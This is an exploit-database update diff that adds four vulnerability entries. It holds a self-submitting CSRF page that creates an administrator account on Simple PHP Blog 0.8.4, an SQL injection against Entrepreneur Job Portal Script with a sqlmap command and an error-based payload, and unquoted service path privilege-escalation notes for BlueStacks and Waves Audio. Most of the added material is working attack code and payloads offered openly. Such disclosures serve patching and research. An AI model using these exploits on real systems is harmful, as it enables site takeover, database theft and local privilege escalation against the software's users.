DB: 2016-10-08

4 new exploits

MLM Unilevel Plan Script v1.0.2 - SQL Injection
MLM Unilevel Plan Script 1.0.2 - SQL Injection

Comodo Dragon Browser - Unquoted Service Path Privilege Escalation

Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
Entrepreneur Job Portal Script - SQL Injection
BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation
Waves Audio Service - Unquoted Service Path Privilege Escalation

files.csv

@@ -36587,9 +36587,13 @@ id,file,description,date,author,platform,type,port
 40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
 40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
 40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
-40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
+40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
 40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
-40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
+40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
 40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
-40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
+40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
+40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
+40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
+40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
+40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0

platforms/php/webapps/40475.txt

@@ -0,0 +1,66 @@
+<!--
+
+=========================================================================================================
+Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
+=========================================================================================================
+
+# Exploit Title: Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add
+Admin)
+# Author: Besim
+# Google Dork: -
+# Date: 07/10/2016
+# Type: webapps
+# Platform : PHP
+# Vendor Homepage: http://simpleblogphp.com/
+# Software Link: https://sourceforge.net/projects/sphpblog/
+# Version: 0.8.4
+# Tested on: Ubuntu 14.04.5
+
+Simple PHP Blog 0.8.4 versions is vulnerable to CSRF attack (No CSRF token
+in place)
+meaning that if an admin user can be tricked to visit a crafted URL created
+by
+attacker (via spear phishing/social engineering), a form will be submitted
+to (*http://localhost/simple/manage_users.php?action=update&type=new
+<http://localhost/simple/manage_users.php?action=update&type=new>*) that
+will add a new user as administrator.
+
+Once exploited, the attacker can login to the admin panel
+(*http://localhost/simple/login.php <http://localhost/simple/login.php>*)
+using the username and the password he posted in the form.
+
+*CSRF PoC Code*
+=============
+
+-->
+
+<html>
+  <body>
+    <form action="
+http://localhost/simple/manage_users.php?action=update&type=new"
+method="POST">
+      <input type="hidden" name="sUsername" value="Besim" />
+      <input type="hidden" name="sFullname" value="Besim" />
+      <input type="hidden" name="sPassword" value="mehmet" />
+      <input type="hidden" name="sEmail" value="mehmet&#64;yopmail&#46;com"
+/>
+      <input type="hidden" name="sAvatar" value="" />
+      <input type="hidden" name="sActive" value="on" />
+      <input type="hidden" name="sModComments" value="on" />
+      <input type="hidden" name="sDeleteEntries" value="on" />
+      <input type="hidden" name="sEditAny" value="on" />
+      <input type="hidden" name="submit" value="Create&#32;User" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+
+
+
+-- 
+
+Besim ALTiNOK

platforms/php/webapps/40479.txt

@@ -0,0 +1,52 @@
+[x]========================================================================================================================================[x]
+ | Title        : Entrepreneur Job Portal Script SQL Injection
+ | Software     : Entrepreneur Job Portal Script
+ | Version		: 2.06
+ | Vendor       : http://www.i-netsolution.com/
+ | Demo         : http://www.i-netsolution.com/item/entrepreneur-job-portal-script/live_demo/853208
+ | Date         : 07 October 2016
+ | Author       : OoN_Boy
+[x]========================================================================================================================================[x]
+  
+  
+  
+[x]========================================================================================================================================[x]
+ | Technology       : PHP
+ | Database         : MySQL
+ | Price            : $353 - $1399 
+ | Description      : Jobsite Script is an advanced PHP job site script to start Job site like all popular . It is a complete script with advanced features.
+[x]========================================================================================================================================[x]
+  
+  
+[x]========================================================================================================================================[x]
+ | Proof of concept SQL	1	: http://localhost/job-portal/jobsearch_all.html?sch=%Inject_Here%21
+ | Proof of concept SQL	2	: http://localhost/job-portal/jobsearch_all.html?cmpid=%Inject_Here%21
+ |
+ | Admin Page				: http://localhost/[path]/admin/index.php  
+[x]========================================================================================================================================[x]
+  
+  
+  
+[x]========================================================================================================================================[x]
+ | Exploit With Sqlmap
+ 
+	sqlmap -u 'http://localhost/job-portal/jobsearch_all.html?cmpid=31453525536'
+	
+	---
+	Parameter: cmpid (GET)
+		Type: error-based
+		Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+		Payload: cmpid=31453525536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8347=8347,1))),0x7178716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjF'='tqjF
+	---
+
+[x]========================================================================================================================================[x]
+  
+[x]========================================================================================================================================[x]
+ | Greetz   :   antisecurity.org batamhacker.or.id
+ |              Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
+ |              k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
+[x]========================================================================================================================================[x]
+ 
+[x]========================================================================================================================================[x]
+| Hi All long time no see ^_^
+[x]========================================================================================================================================[x]

platforms/windows/local/40477.txt

@@ -0,0 +1,51 @@
+# Exploit Title: BlueStacks 2.5.55 Unquoted Service Path Privilege Escalation
+# Date: 24/09/2016
+# Author: Yunus YILDIRIM (@Th3GundY)
+# Team: CT-Zer0 (@CRYPTTECH)
+# Website: http://yildirimyunus.com
+# Contact: yunusyildirim@protonmail.com
+# Category: local
+# Vendor Homepage: http://www.bluestacks.com/
+# Version: Software Version <= 2.5.55
+# Tested on: Windows 7-10 x86/x64
+
+1. Description
+
+BlueStacks Log Rotator Service (BstHdLogRotatorSvc) installs as a service with 
+an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+
+2. Proof of Concept
+
+C:\>sc qc BstHdLogRotatorSvc
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: BstHdLogRotatorSvc
+        TYPE               : 10  WIN32_OWN_PROCESS 
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : BlueStacks Log Rotator Service
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem		
+		
+		
+3. Exploit:
+ 
+A successful attempt would require the local attacker must insert an executable file
+in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+
+Additional notes :
+
+Fixed in version v2.5.61
+
+Vulnerability Disclosure Timeline:
+=========================
+24/09/2016   -   Contact With Vendor
+28/09/2016   -   Vendor Response
+04/10/2016   -   Release Fixed Version

platforms/windows/local/40478.txt

@@ -0,0 +1,31 @@
+Waves Audio Service:	http://www.maxx.com
+By Ross Marks: 			http://www.rossmarks.co.uk
+Exploit-db:				https://www.exploit-db.com/author/?a=8724
+Category:				Local
+Tested on:				Windows 10 x86/x64
+
+1) Unquoted Service Path Privilege Escalation 
+
+Max audio drivers (dell default ones) installs as a service with an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
+
+A successful attempt would require the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+PoC:
+
+C:\WINDOWS\system32>sc qc WavesSysSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WavesSysSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Waves Audio Services
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+